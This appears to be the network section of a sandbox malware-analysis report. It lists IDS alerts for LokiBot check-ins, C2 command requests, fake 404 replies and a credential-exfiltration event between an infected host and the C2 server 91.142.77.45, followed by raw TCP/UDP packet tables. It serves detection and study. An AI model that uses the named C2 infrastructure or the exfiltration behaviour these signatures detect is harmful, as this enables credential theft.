192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49708	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49717	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49739	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65044	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49713	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49715	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56086	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49728	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49720	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49724	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49720	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	54903	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56547	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59504	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497272025483 11/03/22-12:31:03.547635	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49727	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497362025483 11/03/22-12:31:30.738262	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49736	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497382025483 11/03/22-12:31:35.287070	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49738	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549717802021641 11/03/22-12:30:35.019960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802825766 11/03/22-12:31:29.221112	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802025381 11/03/22-12:31:43.782645	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.852556532014169 11/03/22-12:30:47.939957	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52556	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549723802024313 11/03/22-12:30:53.367985	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802025381 11/03/22-12:30:31.132672	TCP	2025381	ET TROJAN LokiBot Checkin	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549708802825766 11/03/22-12:30:14.035064	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802024313 11/03/22-12:31:41.893270	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802025381 11/03/22-12:31:45.577786	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802024318 11/03/22-12:31:05.707382	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497302025483 11/03/22-12:31:09.196542	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49730	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549742802024318 11/03/22-12:31:41.893270	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549729802024313 11/03/22-12:31:05.707382	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802021641 11/03/22-12:31:07.626823	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802825766 11/03/22-12:31:43.782645	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497252025483 11/03/22-12:30:59.345748	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49725	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549707802024312 11/03/22-12:30:11.977904	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802024318 11/03/22-12:31:20.467945	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862520532014169 11/03/22-12:31:07.541345	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62520	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857322532014169 11/03/22-12:31:39.862228	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	57322	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549707802024317 11/03/22-12:30:11.977904	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802024313 11/03/22-12:31:20.467945	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802024313 11/03/22-12:30:25.414440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802024318 11/03/22-12:30:59.657451	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802825766 11/03/22-12:30:54.913991	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802825766 11/03/22-12:31:01.987085	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802021641 11/03/22-12:30:45.793165	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802825766 11/03/22-12:30:37.003049	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802024318 11/03/22-12:30:53.367985	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802021641 11/03/22-12:30:20.264286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802825766 11/03/22-12:31:07.626823	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49730	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497442025483 11/03/22-12:31:47.249314	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49744	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549708802021641 11/03/22-12:30:14.035064	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49708	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497192025483 11/03/22-12:30:45.376826	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49719	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497082025483 11/03/22-12:30:15.684954	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49708	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497332025483 11/03/22-12:31:25.021802	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49733	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549733802825766 11/03/22-12:31:22.614964	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802021641 11/03/22-12:30:27.432237	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802024313 11/03/22-12:30:59.657451	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497112025483 11/03/22-12:30:21.541561	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49711	91.142.77.45	192.168.2.6
192.168.2.68.8.8.852079532014169 11/03/22-12:31:11.161882	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52079	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549710802024313 11/03/22-12:30:18.297577	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802025381 11/03/22-12:30:22.162497	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802024318 11/03/22-12:30:18.297577	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802024318 11/03/22-12:31:50.569101	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.861833532014169 11/03/22-12:31:25.278309	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61833	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802021641 11/03/22-12:31:22.614964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802025381 11/03/22-12:30:09.785093	TCP	2025381	ET TROJAN LokiBot Checkin	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802825766 11/03/22-12:30:20.264286	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49711	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497222025483 11/03/22-12:30:53.023996	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49722	91.142.77.45	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:30:06.648422003 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.705056906 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.767577887 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:09.767824888 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.785093069 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.847585917 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:09.847696066 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:09.911494017 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.378333092 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.378524065 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.378582001 CET	49706	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.441195965 CET	80	49706	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.912462950 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.974523067 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:11.974664927 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:11.977904081 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:12.039987087 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:12.040091991 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:12.102111101 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.686108112 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.686407089 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:13.689996004 CET	49707	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:13.752177954 CET	80	49707	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:13.960999012 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.024719000 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:14.024915934 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.035063982 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.097285032 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:14.097431898 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:14.159482002 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:15.684953928 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:15.685059071 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:15.685152054 CET	49708	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:15.747353077 CET	80	49708	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.009772062 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.071901083 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.072161913 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.075566053 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.137646914 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:16.137861967 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:16.199959040 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:17.656419039 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:17.656625032 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:17.656876087 CET	49709	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:17.718825102 CET	80	49709	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.232103109 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.294275999 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.294435978 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.297576904 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.359631062 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:18.359889030 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.666949987 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:18.729307890 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:19.791138887 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:19.791312933 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:19.791399956 CET	49710	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:19.853351116 CET	80	49710	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.195004940 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.257170916 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.260675907 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.264286041 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.326256037 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:20.327415943 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:20.389652014 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:21.541560888 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:21.541733980 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:21.541781902 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:21.854696989 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.066165924 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.128371954 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.128586054 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.162497044 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.224786043 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.224951029 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.287046909 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:22.464206934 CET	49711	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:22.527188063 CET	80	49711	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:23.556931019 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:23.557039022 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:23.557166100 CET	49712	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:23.619096041 CET	80	49712	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.335967064 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.401177883 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.401310921 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.414439917 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.476397991 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:25.476478100 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:25.538403988 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:26.998667002 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.002180099 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.002180099 CET	49713	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.064440012 CET	80	49713	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.367080927 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.428744078 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.428901911 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.432236910 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.493885994 CET	80	49714	91.142.77.45	192.168.2.6
Nov 3, 2022 12:30:27.493982077 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:27.886517048 CET	49714	80	192.168.2.6	91.142.77.45
Nov 3, 2022 12:30:28.386557102 CET	49714	80	192.168.2.6	91.142.77.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:30:06.615612984 CET	49786	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:06.635174990 CET	53	49786	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:11.893251896 CET	58595	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:11.910538912 CET	53	58595	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:13.938466072 CET	56331	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:13.958684921 CET	53	56331	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:15.990658998 CET	50506	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:16.008389950 CET	53	50506	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:17.960731983 CET	49448	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:18.222553015 CET	53	49448	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:20.174104929 CET	59082	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:20.193391085 CET	53	59082	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:22.044584990 CET	59504	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:22.064102888 CET	53	59504	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:25.312644958 CET	65198	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:25.332699060 CET	53	65198	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:27.345777988 CET	62910	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:27.365106106 CET	53	62910	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:30.240421057 CET	63863	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:31.064527988 CET	53	63863	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:32.906943083 CET	63229	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:32.924936056 CET	53	63229	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:34.919732094 CET	62538	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:34.938977957 CET	53	62538	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:36.914690018 CET	54903	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:36.935085058 CET	53	54903	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:41.510499001 CET	51530	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:41.802865028 CET	53	51530	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:45.704906940 CET	56122	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:45.724493027 CET	53	56122	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:47.939956903 CET	52556	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:47.958667994 CET	53	52556	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:50.734925985 CET	61609	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:50.754672050 CET	53	61609	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:53.275834084 CET	52481	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:53.293008089 CET	53	52481	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:54.819243908 CET	53943	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:54.838155985 CET	53	53943	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:57.832797050 CET	56086	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:57.850481033 CET	53	56086	8.8.8.8	192.168.2.6
Nov 3, 2022 12:30:59.560048103 CET	56547	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:30:59.579384089 CET	53	56547	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:01.170101881 CET	59881	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:01.189847946 CET	53	59881	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:03.812359095 CET	58917	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:03.831717968 CET	53	58917	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:05.602891922 CET	50343	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:05.622453928 CET	53	50343	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:07.541344881 CET	62520	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:07.558957100 CET	53	62520	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:09.419343948 CET	55629	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:09.438843966 CET	53	55629	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:11.161881924 CET	52079	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:11.179299116 CET	53	52079	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:22.519120932 CET	56569	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:22.538552046 CET	53	56569	8.8.8.8	192.168.2.6
Nov 3, 2022 12:31:25.278309107 CET	61833	53	192.168.2.6	8.8.8.8
Nov 3, 2022 12:31:25.295921087 CET	53	61833	8.8.8.8	192.168.2.6
